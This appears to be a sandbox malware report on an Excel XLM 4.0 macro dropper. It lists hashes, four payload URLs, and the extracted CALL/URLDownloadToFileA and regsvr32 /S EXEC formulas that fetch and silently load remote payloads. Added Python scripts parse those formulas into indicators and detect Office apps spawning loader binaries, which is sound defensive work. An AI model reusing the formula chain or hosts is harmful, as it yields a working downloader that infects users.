General

  • Target

    5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xlsx

  • Size

    92KB

  • Sample

    230211-cs3qnadc8y

  • MD5

    c8d86480cae889d55896e2642369a5f1

  • SHA1

    5912e9a715533d5b9110daab4dbafe49236c8891

  • SHA256

    5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946

  • SHA512

    8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714

  • SSDEEP

    1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/

http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/

https://wijsneusmedia.nl/cgi-bin/kFB/

http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/","..\elv1.ooocccxxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/","..\elv2.ooocccxxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wijsneusmedia.nl/cgi-bin/kFB/","..\elv3.ooocccxxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/","..\elv4.ooocccxxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")
    =RETURN()
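The formula chain above is a plain XLM 4.0 stager: each CALL into urlmon!URLDownloadToFileA writes one payload to a relative path with a non-DLL extension, and the following EXEC loads it silently through regsvr32 /S. The script below is an added example (not part of the sandbox report) that parses that formula string into download/execute stages and derives the indicators a defender would block or hunt on. The formula text is embedded as a constructed copy of the Attributes listing; the pairing heuristic (an EXEC belongs to the CALL whose drop path it mentions) and the finding labels are this example's own assumptions.

```python
"""Parse Excel 4.0 (XLM) dropper formulas into download/execute stages and IOCs."""
import csv
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Constructed copy of the formulas listed under Attributes above
# (eight formulas plus RETURN, space separated, as the report prints them).
SAMPLE_FORMULAS = " ".join([
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/","..\\elv1.ooocccxxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\elv1.ooocccxxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/","..\\elv2.ooocccxxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\elv2.ooocccxxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wijsneusmedia.nl/cgi-bin/kFB/","..\\elv3.ooocccxxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\elv3.ooocccxxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/","..\\elv4.ooocccxxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\elv4.ooocccxxx")',
    '=RETURN()',
])

# One formula is "=NAME(args)". The lazy body match stops only at a ")" that is
# followed by the next "=NAME" or the end of input, so a ")" inside a quoted
# argument cannot terminate the formula early.
FORMULA_RE = re.compile(r'=([A-Z][A-Z0-9.]*)\((.*?)\)(?=\s*=[A-Z]|\s*$)', re.S)


def split_args(argstr: str) -> list:
    """Split a formula argument list; csv handles the double-quoted strings."""
    if not argstr.strip():
        return []
    return next(csv.reader([argstr], skipinitialspace=True))


@dataclass
class Stage:
    url: str
    drop_path: str
    exec_cmd: Optional[str] = None


def parse_stages(formulas: str) -> list:
    """Pair each URLDownloadToFile CALL with the EXEC that runs its drop path."""
    stages = []
    for name, argstr in FORMULA_RE.findall(formulas):
        args = split_args(argstr)
        if (name == "CALL" and len(args) >= 6 and args[0].lower() == "urlmon"
                and args[1].startswith("URLDownloadToFile")):
            # URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB)
            stages.append(Stage(url=args[4], drop_path=args[5]))
        elif name == "EXEC" and args:
            cmd = args[0]
            # Heuristic (assumption): the EXEC belongs to the first unmatched
            # stage whose drop path appears in the command line.
            for st in stages:
                if st.exec_cmd is None and st.drop_path.lower() in cmd.lower():
                    st.exec_cmd = cmd
                    break
    return stages


def iocs(stages: list) -> dict:
    """Network and host indicators to block or hunt on."""
    return {
        "urls": [s.url for s in stages],
        "hosts": sorted({urlparse(s.url).hostname for s in stages}),
        "drop_paths": [s.drop_path for s in stages],
        "loaders": sorted({s.exec_cmd.split()[0] for s in stages if s.exec_cmd}),
    }


def findings(stages: list) -> list:
    """Explain why each stage is suspicious (labels are this example's own)."""
    out = []
    for s in stages:
        if s.exec_cmd is None:
            out.append(f"{s.drop_path}: downloaded but never executed")
            continue
        exe = s.exec_cmd.split()[0].lower()
        if exe.endswith("regsvr32.exe") and " /s " in f" {s.exec_cmd.lower()} ":
            out.append(f"{s.drop_path}: silent regsvr32 load (/S hides DllRegisterServer error dialogs)")
        if not s.drop_path.lower().endswith((".dll", ".ocx")):
            out.append(f"{s.drop_path}: DLL loaded from a non-DLL extension")
        if s.drop_path.startswith("..\\"):
            out.append(f"{s.drop_path}: relative drop path (parent of the document's working directory)")
    return out


if __name__ == "__main__":
    parsed = parse_stages(SAMPLE_FORMULAS)
    for st in parsed:
        print(st)
    print(iocs(parsed))
    for line in findings(parsed):
        print(line)
```

Four URLs with the same drop-and-load pattern are the expected shape for this family of stager: each is a fallback, so blocking one host does not stop the chain, and the hunt should key on the regsvr32 /S invocation against a non-DLL extension rather than on any single domain.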

Extracted

Language
xlm4.0

Source          URL
xlm40.dropper   http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
xlm40.dropper   http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
xlm40.dropper   https://wijsneusmedia.nl/cgi-bin/kFB/
xlm40.dropper   http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/

Targets

    • Target

      5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xlsx

    • Size

      92KB

    • MD5

      c8d86480cae889d55896e2642369a5f1

    • SHA1

      5912e9a715533d5b9110daab4dbafe49236c8891

    • SHA256

      5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946

    • SHA512

      8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714

    • SSDEEP

      1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
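The signature fires because the Excel process spawns a child it has no business starting; in this sample the EXEC formulas make that child regsvr32.exe. The detection below is an added example (not the sandbox's own rule) that evaluates Sysmon Event ID 1 style process-creation records and raises on an Office parent launching a script or loader binary, with extra reasons for the regsvr32 command-line traits seen in this chain. The event records are constructed for the example, and the lists of Office parents, loader children and expected helper children are assumptions to tune per environment.

```python
"""Flag Office parents spawning script/loader binaries (Sysmon EID 1 style events)."""
import ntpath

# Assumptions for the example: tune these sets to the estate being monitored.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOADER_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                   "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe"}
EXPECTED_CHILDREN = {"splwow64.exe"}   # print-spooler helper Excel legitimately starts

# Constructed sample events (not taken from the sandbox run); field names follow Sysmon EID 1.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Vendor\plugin.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami"},
]


def basename(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return ntpath.basename(path).lower()


def regsvr32_oddities(cmdline: str) -> list:
    """Command-line traits of a regsvr32 invocation worth calling out."""
    tokens = cmdline.split()
    flags = {t.lower() for t in tokens[1:] if t.startswith("/")}
    targets = [t for t in tokens[1:] if not t.startswith("/")]
    out = []
    if "/s" in flags:
        out.append("/S suppresses the DllRegisterServer result dialog")
    for t in targets:
        if not t.lower().endswith((".dll", ".ocx")):
            out.append(f"target {t} lacks a DLL extension")
        if t.startswith("..\\") or t.startswith(".\\"):
            out.append(f"target {t} is a relative path")
    return out


def evaluate(event: dict):
    """Return an alert dict for an unexpected Office child, or None."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent not in OFFICE_PARENTS or child in EXPECTED_CHILDREN:
        return None
    reasons = [f"{parent} spawned {child}"]
    severity = "medium"            # any unexpected child is worth a look
    if child in LOADER_CHILDREN:
        severity = "high"          # classic macro/exploit hand-off to a LOLBin
        reasons.append("child is a script/loader binary commonly abused by macros")
    if child == "regsvr32.exe":
        reasons.extend(regsvr32_oddities(event["CommandLine"]))
    return {"severity": severity, "parent": parent, "child": child, "reasons": reasons}


def scan(events: list) -> list:
    """Evaluate a batch of process-creation events and keep the alerts."""
    return [a for a in (evaluate(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["parent"], "->", alert["child"])
        for r in alert["reasons"]:
            print("   ", r)
```

Whitespace splitting of the command line is adequate for the traits checked here but will mis-tokenise quoted paths containing spaces; a production rule should use the parsed argument vector the sensor provides where available.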

MITRE ATT&CK Matrix (ATT&CK v6)

Defense Evasion
  Modify Registry (T1112): 1

Discovery
  Query Registry (T1012): 2
  System Information Discovery (T1082): 2

Tasks